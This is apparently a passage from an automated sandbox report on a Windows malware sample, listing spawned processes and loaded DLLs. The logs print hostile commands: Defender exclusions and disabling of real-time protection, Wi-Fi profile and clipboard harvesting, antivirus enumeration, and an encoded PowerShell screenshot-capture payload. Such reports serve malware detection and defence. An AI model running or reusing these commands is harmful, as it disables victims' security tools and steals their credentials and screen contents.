QApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: websocket.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: dhcpcsvc6.dllJump to behavior
